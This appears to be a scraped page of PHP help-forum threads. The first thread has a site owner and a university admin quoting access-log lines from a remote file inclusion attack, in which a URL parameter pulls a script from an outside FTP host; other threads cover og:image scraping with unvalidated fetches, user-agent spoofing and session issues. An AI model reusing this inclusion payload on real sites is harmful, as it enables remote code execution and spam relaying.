User create folder in FTP from HTML - php

I'm facing a big problem and I can't find the cause. I have a website running in apache in port 80 with ftp access.
Some user is creating FTP folders with malicious commands. I analysed the apache log and found the following strange lines:
[08/Jul/2016:22:54:09 -0300] "POST /index.php?pg=ftp://zkeliai:zkeliai#zkeliai.lt/Thumbr.php?x&action=upload&chdir=/home/storage/9/ff/8d/mywebsite/public_html/Cliente/ HTTP/1.1" 200 18391 "http://mywebsite/index.php?pg=ftp://zkeliai:zkeliai#zkeliai.lt/Thumbr.php?x&chdir=/home/storage/9/ff/8d/mywebsite/public_html/Cliente/" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
In my FTP the following folder was created: /public_html/Cliente
I have a piece in my code that uses $_GET['pg'], see:
$pg = isset($_GET['pg']) ? $_GET['pg'] : null;
$pg = htmlspecialchars($pg, ENT_QUOTES);
I tried test the command "pg=ftp://zkeliai..." like hacker did, but nothing happens, and I expected this. I'm very confused in how hacker the created a folder in my FTP.

Without knowing what $pg is being used for, it's not really possible to get what the hacker is doing, but it looks like he send a POST request to index.php with the parameters
?pg=ftp://zkeliai:zkeliai#zkeliai.lt/Thumbr.php?x&chdir=/home/storage/9/ff/8d/mywebsite/public_html/Cliente/
The effect of your sanitation with htmlspecialchars is to convert the one & in the string to &. When the request is processed by index.php, but, it will be converted back to & in an internal string as PHP will assume it was just URL encoded, so when index.php is sending its server-side request to Thumbr.php, the & is present and serves to send parameters to the FTP.

We had a similar issue on our university's site. We have over 2200 hits the last few days from this IP with two different .php pages: showcase.php and Thumbr.php
Here's a snippet from our log
POST /navigator/index.php page=ftp://zkeliai:zkeliai#zkeliai.lt/zkeliai/showcase.php? 80 - 177.125.20.3 Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+6.1;+WOW64;+Trident/4.0;+SLCC2;+.NET+CLR+2.0.50727;+.NET+CLR+3.5.30729;+.NET+CLR+3.0.30729;+Media+Center+PC+6.0;+.NET4.0C;+.NET4.0E) 200 0 0 11154
This page was used to send spam through our SMTP server. The page= GET parameter in the URL was being loaded by our PHP page with no filtering on the value. The showcase.php page (no longer on the FTP site) was a simple HTML form with a field for a subject, a field for HTML body contents, and a text area for email recipients.
Without being sure what was posted, it seems loading the ftp page (with the included credentials) into PHP with the $_GET[] managed to execute the content on that page? I'm unclear as to how that may work, but that seems to be what happened.

Related

Php script that works in fetching og:image from url but fails on specific ones

Hello i'm trying to build a custom script in php that fetches the og:image property in an array and then printout the specific result. I've used the following code
<?php
$_URL = $_GET['url']; //getting the url from THE url value
function getSiteOG( $url, $specificTags=0 ){
$doc = new DOMDocument();
#$doc->loadHTML(file_get_contents($url));
$res['title'] = $doc->getElementsByTagName('title')->item(0)->nodeValue;
foreach ($doc->getElementsByTagName('meta') as $m){
$tag = $m->getAttribute('name') ?: $m->getAttribute('property');
if(in_array($tag,['description','keywords']) || strpos($tag,'og:')===0) $res[str_replace('og:','',$tag)] = $m->getAttribute('content');
}
return $specificTags? array_intersect_key( $res, array_flip($specificTags) ) : $res;
}
$_ARRAY = getSiteOG("$_URL");
echo $_ARRAY['image'];
?>
and when used with the following syntax e.g. on the our site
tags.php?url=http://www.stackoverflow.com
it prints out the following result
https://cdn.sstatic.net/Sites/stackoverflow/img/apple-touch-icon#2.png?v=73d79a89bded
Which is acceptable.
The script is being run on a batch file using the following method
#echo off
PowerShell -Command "(new-object net.webclient).DownloadString('http://yoursite.com/tags.php?url=https://www.banggood.com/TKEXUN-M2-Flip-Phone-2800mAh-3_0-inch-Touch-Screen-Blutooth-FM-Dual-Sim-Card-Flip-Feature-Phone-p-1367504.html')"
PowerShell -Command "(new-object net.webclient).DownloadString('http://yoursite.com/tags.php?url=https://www.banggood.com/Xiaomi-Mi-9T-Pro-Global-Version-6_39-inch-48MP-Triple-Camera-NFC-4000mAh-6GB-64GB-Snapdragon-855-Octa-core-4G-Smartphone-p-1547570.html?ID=564486&cur_warehouse=HK')"
PowerShell -Command "(new-object net.webclient).DownloadString('http://yoursite.com/tags.php?url=https://www.banggood.com/OnePlus-7-6_41-Inch-FHD-AMOLED-Waterdrop-Display-60Hz-NFC-3700mAh-48MP-Rear-Camera-8GB-256GB-UFS-3_0-Snapdragon-855-Octa-Core-4G-Smartphone-p-1499559.html?ID=62208216150349&cur_warehouse=HK')"
That in return prints out on the screen the resulting links or when pipe'd on a file to a file,
it also works with list of urls on a file on another batch script, but it doesn't matter now
The problem i'm experiencing is
When i try to fetch the og:image links of links like from gearbest website
for example this one
https://www.gearbest.com/headsets/pp_009839056462.html
I get no results!!!
I've run simple commands like wget -qO- url or curl -I url for headers and the result is that it has something to do with how my php was compiled, or even curls, on the SSL side.
I've read here that some sites need newer secure ssl etc.
To be noted i've also tried masquerading the wget request by changing user agent and other cookie related values on the fly, but still with no success.
I'm on a shared hosting with shell access on a jailed shell but with many binary tools, sed/awk/wget/curl etc and the host site is quite helpful in helping me resolve my problems by adding binaries i may need, but still i don't know how to proceed.
Any help is greatly appreciated
You're probably blocked due to your user-agent. I tried a curl to gearbest as well, and got a 403 permission denied error. Akamai seems to be blocking this user-agent.
But when I used something like curl -H "User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_1) AppleWebKit/537.36 (K HTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36" URL it worked fine.

How to get the total data consumed to render a web page in php

Browser console displays the size of all downloaded css,js and images in a http request in bytes.How to get this data in php?
Any help would be appreciated.
If you are making external requests using HTTP (like what Inspect Element is showing) you can parse the HTTP Header or send a HEAD request instead of GET / POST to get the Content-Length header. The HTTP Head request will not return the content of the file but only the header information which can save a lot of resources if you don't care about the content of the page you are requesting. If you do want the content, just send a GET / POST request and parse the response header that is always returned.
If you are wondering how large a file is on your own server that PHP is running on, you can use filesize() which will show you the file size in bytes. If the file isn't known, a FALSE will be returned.
int filesize ( string $filename )
You can evaluate the http servers access log file where (usually) the transferred size is written. This requires read permission for the http server process itself and can obviously only be done after a request has been finished. Note that this way you will be blind towards data cached by the client side or a proxy server in between client and server.
This is an example entry:
::1 - - [19/Feb/2014:09:45:38 +0100] "GET /test.html HTTP/1.1" 200 129 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.102 Safari/537.36 SUSE/32.0.1700.102"
You can see the size as "129" bytes next to the return code http-200 (OK). There are packages for this (awstats and the like), but in your case it might be easier to just "grep through" the file. It might be non trivial though to decide what requests belong together forming a "page load".
Your specific requirements are a little vague (on your own server, or parsing someone else's webpages?), but you get filesize from php using this function:
int filesize ( string $filename );

Strange behavior on Linux (php/mysql)

We're having strange behavior on our linux server. Here are some symptoms:
1) PHP using old information when processing scripts:
For example: I loaded up the site today and it ran the mobile version of our Joomla 2.5.9 template instead of the normal template. I looked through the access log and two minutes before I loaded the site up an iPhone had accessed the site. So, for some reason the PHP code ‘thought’ that my access was still the iPhone. Here’s a snip from the access log.
74.45.141.88 - - [01/Mar/2013:07:39:24 -0800] "GET / HTTP/1.1" 200 9771 "https://m.facebook.com" "Mozilla/5.0 (iPhone; CPU iPhone OS 6_1 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Mobile/10B141 [FBAN/FBIOS;FBAV/5.5;FBBV/123337;FBDV/iPhone2,1;FBMD/iPhone;FBSN/iPhone OS;FBSV/6.1;FBSS/1; FBCR/AT&T;FBID/phone;FBLC/en_US;FBOP/0]"
...
63.224.42.234 - - [01/Mar/2013:07:43:45 -0800] "GET / HTTP/1.1" 200 9771 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:19.0) Gecko/20100101 Firefox/19.0"
2) Links on the site are sometimes being generated within Joomla differently: sometimes "ww.sitename.com" or just "sitename.com" when it should be "www.sitename.com".
3) When I make a configuration change to the site (within Joomla administration), it doesn't always take immediately, though it should. For instance, when click publish something using the user interface, it will still be published for quite a while after I unpublished it. During a problem like this, I have tried restarting both Apache and MySQL and it didn't help. I had to wait until something updated. Eventually it does update.
4) The php session doesn't consistently work. We have code that generates a captcha from a session variable. The code fails sometimes rendering the captcha inoperable.
All the above is totally inconsistent. Sometimes it wigs out other times it doesn't. Also, note that the site works totally fine on our dev.sitename.com. We even tried to switch the Apache webserver configuration from our dev.sitename.com to our sitename.com. And the problem still persists.
Thank you.
I had a similar problems with magento CMS in my case the problem was cache used by magento. Disabling the caching functionality had solved the problem.

How to spoof useragent for a php script run through cron

I am running a PHP script through cron every 30 minutes which parses and save some pages of my site on the same server. I need to run the script as Firefox or chrome useragent, since the parsed pages has some interface dependency on CSS3 styles.
I tried this within my script:
curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.13) Gecko/20080311 Firefox/2.0.0.13");
But the Firefox or Chrome dependent stylesheets doesn't load with it. I tried with both double and single quotes.
My question is: Is it possible to spoof useragent for scripts run through server and not browser and how.
NOTE: I know that my browser dependency for interface is bad. But I want to know if this is even possible.
EDIT
My script runs through the sitemap on the server and create a html cache of the pages in sitemap. It don't need to execute any js or css file. Only thing is to spoof useragent so that the cache generated contains the extra js and css files for that browser that are included in the header.
You can consider that I am generating cache files for all browser type - IE, webkits and firefox. So, that I can serve the cache file to the user based on their browser. At this time I am serving the same files to all users, that is without the extra css files.
I think I will need to hardcode the css file into my page so that it is always included in the cache (non-compatible browser won't show any change but it will only increase the file over-head for them). Thanks anyways
When you run a php script through Cron, the idea is that it is a script, not a webpage being requested. Even if you could spoof the useragent, the css and javascript isn't going to excecuted as if it would be running inside a real web browser. The point of cron is to run scripts, raw scripts, that do, for example, file operations.
Well, at first I would look at your user agent identification. I think it is unnecessary complicated, try simply Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1).
If this should not work for then you could try to execute the curl call as a shell command with exec(). In this case you could run into problems that the page is not really rendered itself. You could workaround this by using a X virtual framebuffer. This would make your page render in memory, not showing any screen output - ergo behave like a browser.
You could do it like this:
exec("xvfb-run curl [...]");
You can also set the user agent by using ini_set('user_agent', 'your-user-agent');
Maybe that will help you.

Session won't start and server variables are incorrect

I am trying to start session this way:
session.auto_start = 1
I set it this way. The session doesn't start. I changed start in my php as the following:
ini_set("session.use_only_cookies",true);
session_save_path(dirname(__file__)."/../User");
Basically, I dont see any file created in that folder.
Also when I do this:
$id=session_id();
I get $id=0;
Why all those mistakes happen?
I am trying to start session this way:
session.auto_start()
Where and how do you do that? Not in code I hope? It's a php.ini setting, and if you want to enable it, you have to do it there.
I changes start in my php as the following:
ini_set("session.use_only_cookies",true);
session_save_path(dirname(__file__)."/../User");
Basically, I dont see any file created in that folder.
Does the user as which PHP runs have permissions on that folder? Haven't you got your PHP files sorted in deeper folders, where "(directory)../User" doesn't exist? Have you tried echoing the path to see where it points? Have you tried manually writing a file there? What about using realpath()?
Also when I do this:
$id=session_id();
I get id=0;
That's a symptom. Your session doesn't start, so you can't get a session ID.
$os=$_SERVER['SERVER_SOFTWARE'];
I am trying to get the operating system and I get nothing.
What do you get? Tried var_dump($os)?
and when I try to do this: $browser= $_SERVER['HTTP_USER_AGENT']; I get weird browser.
Mozilla/5.0 (Windows NT 5.1) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.121 Safari/535.2
That "Weird Browser" is Chrome 15. What's weird about that?
And please enable error reporting since I'm sure there'll be a few hints there.

Categories